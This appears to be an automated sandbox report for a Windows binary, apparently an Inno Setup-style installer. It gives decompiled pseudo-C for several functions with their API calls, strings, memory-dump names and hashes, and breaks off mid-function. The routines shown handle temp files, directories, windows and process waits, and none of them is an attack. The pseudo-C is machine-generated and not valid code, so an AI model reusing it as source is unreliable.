                                                                    0x00405a6c
                                                                    0x00405a6f
                                                                    0x00405a70
                                                                    0x00405a70
                                                                    0x00405a3d
                                                                    0x00405a3d
                                                                    0x00405a41
                                                                    0x00405a41
                                                                    0x00405a44
                                                                    0x00405a47
                                                                    0x00405a4a
                                                                    0x00405a74
                                                                    0x00405a77
                                                                    0x00405a7a
                                                                    0x00405a7d
                                                                    0x00405a80
                                                                    0x00405a81
                                                                    0x00405a4c
                                                                    0x00405a4c
                                                                    0x00405a4f
                                                                    0x00405a50
                                                                    0x00405a50
                                                                    0x00405a4a
                                                                    0x00405a3b

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
                                                                    • Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
                                                                    • Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
                                                                    • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                                    • Instruction ID: 7a051e160dd760b70f5de690832b1da94a718f6c47d0b95a7d4eebd5f387ad29
                                                                    • Opcode Fuzzy Hash: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                                    • Instruction Fuzzy Hash: BCC1F272601B118BDB15CF69E884B27BBA2EB85310F18827FD4599F3D5C7B4A841CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060D3B4, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 39%
                                                                    			E0060D3B4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void* _t60;
				signed int _t63;
				intOrPtr _t77;
				void* _t83;
				intOrPtr _t86;

				_t64 = 0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t86);
				_push(0x60d4f1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				E005C4EA4(_v8,  &_v24);
				E0040A5F0( &_v8, _v24);
				_t83 = 0x123456;
				_t63 = 0;
				_v17 = 0;
				do {
					_t83 = _t83 + 1;
					if(_t83 > 0x1ffffff) {
						_t83 = 0;
					}
					_t90 = 0x123456 - _t83;
					if(0x123456 == _t83) {
						_t9 =  &_v32; // 0x6b7447
						E005C567C(_v8, _t64, _t9, _t90);
						_t11 =  &_v32; // 0x6b7447
						E005CD508(0x5a,  &_v28,  *_t11);
						_t64 = _v28;
						E00429008(_v28, 1);
						E004098C4();
					}
					_push(_v8);
					_push("_iu");
					E0060D21C(_t83, _t63,  &_v36, 0x123456, _t83);
					_push(_v36);
					_push(L".tmp");
					E0040B550( &_v12, _t63, 4, 0x123456, _t83);
					if(E005C6880(_t90) == 0) {
						_t63 = 1;
						_v17 = E005C685C(_v12);
						if(_v17 != 0) {
							_t60 = CreateFileW(E0040B278(_v12), 0xc0000000, 0, 0, 2, 0x80, 0);
							_t63 = 0 | _t60 != 0xffffffff;
							if(1 != 0) {
								CloseHandle(_t60);
							}
						}
					}
				} while (_t63 == 0);
				E0040A5A8(_v16, _v12);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_push(E0060D4F8);
				E0040A228( &_v36, 4);
				return E0040A228( &_v12, 2);
			}
















                                                                    0x0060d3b7
                                                                    0x0060d3b9
                                                                    0x0060d3ba
                                                                    0x0060d3bb
                                                                    0x0060d3bc
                                                                    0x0060d3bd
                                                                    0x0060d3be
                                                                    0x0060d3bf
                                                                    0x0060d3c0
                                                                    0x0060d3c4
                                                                    0x0060d3c7
                                                                    0x0060d3cd
                                                                    0x0060d3d4
                                                                    0x0060d3d5
                                                                    0x0060d3da
                                                                    0x0060d3dd
                                                                    0x0060d3e6
                                                                    0x0060d3f1
                                                                    0x0060d3fb
                                                                    0x0060d3fd
                                                                    0x0060d3ff
                                                                    0x0060d403
                                                                    0x0060d403
                                                                    0x0060d40a
                                                                    0x0060d40c
                                                                    0x0060d40c
                                                                    0x0060d40e
                                                                    0x0060d410
                                                                    0x0060d412
                                                                    0x0060d418
                                                                    0x0060d41d
                                                                    0x0060d427
                                                                    0x0060d42c
                                                                    0x0060d436
                                                                    0x0060d43b
                                                                    0x0060d43b
                                                                    0x0060d440
                                                                    0x0060d443
                                                                    0x0060d44d
                                                                    0x0060d452
                                                                    0x0060d455
                                                                    0x0060d462
                                                                    0x0060d471
                                                                    0x0060d473
                                                                    0x0060d47d
                                                                    0x0060d484
                                                                    0x0060d4a1
                                                                    0x0060d4a9
                                                                    0x0060d4ae
                                                                    0x0060d4b1
                                                                    0x0060d4b1
                                                                    0x0060d4ae
                                                                    0x0060d484
                                                                    0x0060d4b6
                                                                    0x0060d4c4
                                                                    0x0060d4cb
                                                                    0x0060d4ce
                                                                    0x0060d4d1
                                                                    0x0060d4de
                                                                    0x0060d4f0

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle
                                                                    • String ID: .tmp$Gtk$_iu
                                                                    • API String ID: 3498533004-1320520068
                                                                    • Opcode ID: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                                    • Instruction ID: 38fd5bd3aef28e796ac18a57f9f91bd27b67d48edde35eb58a18837c564f9665
                                                                    • Opcode Fuzzy Hash: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                                    • Instruction Fuzzy Hash: 73319030E80209ABDB14EBE4C842BDEBBB5AF54308F118169E904B73D1D738AE458B55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B8998, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E006B8998(char __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t61;
				intOrPtr _t66;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				intOrPtr _t99;

				_t100 = __eflags;
				_t95 = __esi;
				_t94 = __edi;
				_t68 = __ebx;
				_t97 = _t98;
				_t99 = _t98 + 0xffffffdc;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				 *[fs:eax] = _t99;
				_t27 =  *0x6cdec4; // 0x6d579c
				E005B8250( *_t27, L"Uninstall", __eflags);
				_t30 =  *0x6cdec4; // 0x6d579c
				ShowWindow( *( *_t30 + 0x188), 5);
				 *[fs:edx] = _t99;
				E006AF824();
				E005C745C( &_v20);
				E00424020(_v20);
				E005C6FB0(0, __ebx,  &_v24, __edi, __esi);
				E0040A5A8(0x6d68d0, _v24);
				E006B6C80(__ebx, __edi, __esi, _t100);
				_t44 =  *0x6d68d0; // 0x0
				E005C4F90(_t44, _t68,  &_v28, L".dat", _t94, _t95);
				E0040A5A8(0x6d68d4, _v28);
				_t48 =  *0x6d68d0; // 0x0
				E005C4F90(_t48, _t68,  &_v32, L".msg", _t94, _t95);
				E0040A5A8(0x6d68d8, _v32);
				_v8 = E005CBFB8(1, 1, 0, 2);
				 *[fs:eax] = _t99;
				 *((intOrPtr*)( *_v8 + 4))( *[fs:eax], 0x6b8af0, _t97,  *[fs:edx], 0x6b8c15, _t97,  *[fs:eax], 0x6b8c4e, _t97, __edi, __esi, __ebx, _t96);
				E005CBF78(_v8, _v40 - 8);
				E005CBF50(_v8, 8,  &_v16);
				if(_v16 == 0x67734d49) {
					_t61 =  *0x6d68d0; // 0x0
					E005CD6BC(_t61, _t68, 1, _v12, _t94, _t95);
				} else {
					_t66 =  *0x6d68d8; // 0x0
					E005CD6BC(_t66, _t68, 1, 0, _t94, _t95);
				}
				_pop(_t92);
				 *[fs:eax] = _t92;
				_push(E006B8AF7);
				return E00408444(_v8);
			}






















                                                                    0x006b8998
                                                                    0x006b8998
                                                                    0x006b8998
                                                                    0x006b8998
                                                                    0x006b8999
                                                                    0x006b899b
                                                                    0x006b89a3
                                                                    0x006b89a6
                                                                    0x006b89a9
                                                                    0x006b89ac
                                                                    0x006b89ba
                                                                    0x006b89bd
                                                                    0x006b89c9
                                                                    0x006b89d0
                                                                    0x006b89de
                                                                    0x006b89ee
                                                                    0x006b89f1
                                                                    0x006b89f9
                                                                    0x006b8a01
                                                                    0x006b8a0b
                                                                    0x006b8a18
                                                                    0x006b8a1d
                                                                    0x006b8a2a
                                                                    0x006b8a2f
                                                                    0x006b8a3c
                                                                    0x006b8a49
                                                                    0x006b8a4e
                                                                    0x006b8a5b
                                                                    0x006b8a78
                                                                    0x006b8a86
                                                                    0x006b8a91
                                                                    0x006b8a9d
                                                                    0x006b8aad
                                                                    0x006b8ab9
                                                                    0x006b8ad0
                                                                    0x006b8ad5
                                                                    0x006b8abb
                                                                    0x006b8abf
                                                                    0x006b8ac4
                                                                    0x006b8ac4
                                                                    0x006b8adc
                                                                    0x006b8adf
                                                                    0x006b8ae2
                                                                    0x006b8aef

                                                                    APIs
                                                                      • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                    • ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE
                                                                      • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                      • Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                                      • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                    • String ID: .dat$.msg$IMsg$Uninstall
                                                                    • API String ID: 3312786188-1660910688
                                                                    • Opcode ID: 87cec6a378dec6b032675d7c559790f2158faaa0e8ad7578a241a316ddb9e1cc
                                                                    • Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
                                                                    • Opcode Fuzzy Hash: 87cec6a378dec6b032675d7c559790f2158faaa0e8ad7578a241a316ddb9e1cc
                                                                    • Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006153AC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E006153AC(struct HWND__* __eax, signed char __edx, void* __ebp) {
				char _v16;
				signed char _v20;
				char _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t8;
				struct HWND__* _t14;
				void* _t21;
				intOrPtr* _t22;
				struct HWND__* _t28;
				void* _t29;
				signed char* _t31;

				_t31 =  &_v20;
				 *_t31 = __edx;
				_t28 = __eax;
				_t21 = SendMessageW(__eax, 0xb06, 0, 0);
				if(_t21 != 0x6020000) {
					_v28 = _t21;
					_v24 = 0;
					_v20 = 0x6020000;
					_v16 = 0;
					_t23 = L"Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)";
					E00429044(_t21, L"Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)", 1, 0x6d62f8, _t28, 1,  &_v28);
					E004098C4();
				}
				 *0x6d62e4 = 1;
				 *0x6d62f4 = _t28;
				_t8 =  *0x615310; // 0x615368
				 *0x6d62f8 = E004785F8(E006158C4, _t8);
				if( *0x6d62f8 == 0) {
					E0060CD28(L"Failed to create DebugClientWnd", _t21);
				}
				_t29 = 4;
				_t22 =  *0x6cdb54; // 0x6cceb4
				do {
					E005C86E0( *0x6d62f8, _t23,  *_t22);
					_t22 = _t22 + 4;
					_t29 = _t29 - 1;
				} while (_t29 != 0);
				_t14 =  *0x6d62f4; // 0x0
				return SendMessageW(_t14, 0xb00,  *0x6d62f8,  *_t31 & 0x000000ff);
			}

















                                                                    0x006153af
                                                                    0x006153b2
                                                                    0x006153b5
                                                                    0x006153cb
                                                                    0x006153d3
                                                                    0x006153d5
                                                                    0x006153d9
                                                                    0x006153de
                                                                    0x006153e6
                                                                    0x006153f2
                                                                    0x006153fe
                                                                    0x00615403
                                                                    0x00615403
                                                                    0x00615408
                                                                    0x0061540f
                                                                    0x00615415
                                                                    0x00615425
                                                                    0x0061542a
                                                                    0x00615431
                                                                    0x00615431
                                                                    0x00615436
                                                                    0x0061543b
                                                                    0x00615441
                                                                    0x00615445
                                                                    0x0061544a
                                                                    0x0061544d
                                                                    0x0061544d
                                                                    0x0061545d
                                                                    0x0061546e

                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
                                                                    • SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463
                                                                    Strings
                                                                    • hSa, xrefs: 00615415
                                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2
                                                                    • Failed to create DebugClientWnd, xrefs: 0061542C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
                                                                    • API String ID: 3850602802-2905362044
                                                                    • Opcode ID: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
                                                                    • Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
                                                                    • Opcode Fuzzy Hash: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
                                                                    • Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00624AA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E00624AA4(HANDLE* __eax) {
				HANDLE* _v8;
				long _v12;
				intOrPtr* _t7;
				long _t11;
				intOrPtr _t27;
				void* _t30;

				_v8 = __eax;
				_push(_t30);
				_push(0x624b25);
				_push( *[fs:edx]);
				 *[fs:edx] = _t30 + 0xfffffff8;
				do {
					_t7 =  *0x6cdec4; // 0x6d579c
					E005B8704( *_t7);
					_t11 = MsgWaitForMultipleObjects(1, _v8, 0, 0xffffffff, 0x4ff);
				} while (_t11 == 1);
				if(_t11 == 0xffffffff) {
					E0060CE84(L"MsgWaitForMultipleObjects");
				}
				if(GetExitCodeProcess( *_v8,  &_v12) == 0) {
					E0060CE84(L"GetExitCodeProcess");
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E00624B2C);
				return CloseHandle( *_v8);
			}









                                                                    0x00624aaa
                                                                    0x00624aaf
                                                                    0x00624ab0
                                                                    0x00624ab5
                                                                    0x00624ab8
                                                                    0x00624abb
                                                                    0x00624abb
                                                                    0x00624ac2
                                                                    0x00624ad6
                                                                    0x00624adb
                                                                    0x00624ae3
                                                                    0x00624aea
                                                                    0x00624aea
                                                                    0x00624b00
                                                                    0x00624b07
                                                                    0x00624b07
                                                                    0x00624b0e
                                                                    0x00624b11
                                                                    0x00624b14
                                                                    0x00624b24

                                                                    APIs
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 00624AD6
                                                                    • GetExitCodeProcess.KERNEL32 ref: 00624AF9
                                                                    • CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                    • API String ID: 2573145106-3235461205
                                                                    • Opcode ID: 361a62daa0bf1d295b617bedeb0d636d14927d9149230c5f986aec38bd004ab5
                                                                    • Instruction ID: b445045a4a45572890d55b61ba1fda7f57045845c9b5a3357f52015174d7dfc9
                                                                    • Opcode Fuzzy Hash: 361a62daa0bf1d295b617bedeb0d636d14927d9149230c5f986aec38bd004ab5
                                                                    • Instruction Fuzzy Hash: CE01A234640605AFD710EFA8ED62E9977EAEB49721F200265F520D73D0DE74ED44CA19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004070B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004070B0(signed int __eax, void* __edx) {
				short _v530;
				short _v1052;
				short _v1056;
				short _v1058;
				signed int _t20;
				void* _t24;
				WCHAR* _t25;

				_t25 =  &_v1052;
				_t24 = __edx;
				_t20 = __eax;
				if(__eax != 0) {
					 *_t25 = (__eax & 0x000000ff) + 0x41 - 1;
					_v1058 = 0x3a;
					_v1056 = 0;
					GetCurrentDirectoryW(0x105,  &_v530);
					SetCurrentDirectoryW(_t25);
				}
				GetCurrentDirectoryW(0x105,  &_v1052);
				if(_t20 != 0) {
					SetCurrentDirectoryW( &_v530);
				}
				return E0040B318(_t24, 0x105,  &_v1052);
			}










                                                                    0x004070b2
                                                                    0x004070b8
                                                                    0x004070ba
                                                                    0x004070be
                                                                    0x004070c8
                                                                    0x004070cc
                                                                    0x004070d3
                                                                    0x004070e7
                                                                    0x004070ed
                                                                    0x004070ed
                                                                    0x004070fc
                                                                    0x00407103
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x0040712a

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CurrentDirectory
                                                                    • String ID: :
                                                                    • API String ID: 1611563598-336475711
                                                                    • Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                    • Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
                                                                    • Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                    • Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0059BDE0, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0059BDE0(int __eax, void* __edx) {
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t45;
				void* _t47;
				int _t48;
				intOrPtr* _t49;

				_t18 = __eax;
				_t49 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x80)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x78));
					if( *((intOrPtr*)(__eax + 0x78)) != 0) {
						return E0059BDE0(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0059BF18(__eax, _t45, _t47));
					_t48 = _t18;
					_t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
					while(_t48 > 0) {
						_t45 = _t48 - 1;
						_t18 = GetMenuState(E0059BF18(_t49, _t45, _t48), _t45, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0059BF18(_t49, _t45, _t48), _t45, 0x400);
							_t40 = 1;
						}
						_t48 = _t48 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t49 + 0x70)) != 0) {
							L14:
							E0059BC9C(_t49, _t45, _t48);
							L15:
							return  *((intOrPtr*)( *_t49 + 0x50))();
						}
